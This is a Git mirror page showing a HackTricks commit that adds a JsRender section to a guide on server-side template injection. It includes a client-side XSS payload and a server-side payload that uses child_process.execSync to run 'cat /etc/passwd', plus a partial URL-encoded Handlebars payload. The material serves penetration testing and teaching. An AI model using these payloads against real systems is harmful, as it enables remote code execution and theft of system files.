Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2020-12-01 16:50:24 +00:00 committed by gitbook-bot
parent af1cb68098
commit 77cd9471fb
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 27 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
pentesting-web/ssti-server-side-template-injection.md
View file

@ -220,6 +220,33 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
### JsRender \(NodeJS\)
| **Template** | **Description** |
| :--- | :--- |
| {{: …}} | Evaluate and render output |
| {{> …}} | Evaluate and render HTML encoded output |
| {{!}} | Comment |
| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) |
* {{:7\*7}} = 49
#### Client Side
```text
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
#### Server Side
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
#### More information
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
### ERB \(Ruby\)
* `{{7*7}} = {{7*7}}`